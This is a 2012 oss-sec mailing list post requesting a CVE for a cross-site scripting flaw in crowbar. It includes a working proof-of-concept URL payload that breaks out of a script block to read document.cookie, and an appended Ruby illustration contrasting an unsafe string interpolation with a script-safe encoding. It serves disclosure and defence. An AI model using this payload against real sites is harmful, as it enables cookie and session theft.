oss-sec mailing list archives

CVE request: crowbar XSS


From: Thomas Biege <thomas () suse de>
Date: Thu, 30 Aug 2012 14:15:19 +0200


Hi,
Matthias Weckbecker of SUSE Linux Products GmbH has found the following
issue in crowbar:

http://crowbar.test.de:3000/utils?waiting=true&file=foo'%3B})%3B}alert(document.cookie)</script><!--

https://github.com/SUSE-Cloud/barclamp-crowbar/commit/90e905b7668a1cc884fb70040f96c7a0a287de48
https://github.com/SUSE-Cloud/barclamp-crowbar/commit/a82ed926c6e3ba2b0cada213c35e4b00f34ea629

Cheers,
Thomas


-- 
Thomas Biege, Project Manager Security, CSSLP
SUSE LINUX GmbH, GF: Jeff Hawn, Jennifer Guild, Felix Imendörffer, HRB
21284 (AG Nürnberg)
--
  He who stops wanting to become better stops being good.
                            -- Marie von Ebner-Eschenbach
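
Added example, not part of the original message and not crowbar's code: it decodes the `file` parameter from the reported URL and renders it into an inline script block two ways, once pasted into a quoted string and once encoded as a script-safe JavaScript literal. The template shape and the `poll()` function name are assumptions made for illustration; the message does not show the affected view.

```ruby
require "json"
require "uri"

# Query string from the reported URL, with the e-mail line wrap re-joined.
REPORTED_QUERY = "waiting=true&file=foo'%3B})%3B}alert(document.cookie)</script><!--"

# Decode the "file" parameter as a web framework would before the view sees it.
def file_param(query)
  URI.decode_www_form(query).to_h.fetch("file")
end

# HYPOTHETICAL sink: the value is pasted into a single-quoted JavaScript string
# inside an inline <script> block. poll() is a made-up function name.
def render_unsafe(file)
  "<script>poll({ file: '#{file}' });</script>"
end

# Encode a value as a JavaScript string literal that is also safe inside
# <script>: JSON quoting handles quotes and backslashes, and the extra pass
# hides <, >, & and the U+2028/U+2029 line separators from the HTML parser.
def js_literal(value)
  JSON.generate(value.to_s).gsub(/[<>&\u2028\u2029]/) { |c| format("\\u%04x", c.ord) }
end

def render_safe(file)
  "<script>poll({ file: #{js_literal(file)} });</script>"
end

# Number of </script> end tags the HTML parser will see in the rendered output.
# More than one means the parameter closed the script block itself.
def script_end_tags(html)
  html.scan(%r{</script}i).length
end

if __FILE__ == $PROGRAM_NAME
  value = file_param(REPORTED_QUERY)
  puts "decoded file parameter: #{value}"
  puts "unsafe: #{render_unsafe(value)}"
  puts "safe:   #{render_safe(value)}"
  puts "end tags unsafe=#{script_end_tags(render_unsafe(value))} safe=#{script_end_tags(render_safe(value))}"
end
```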
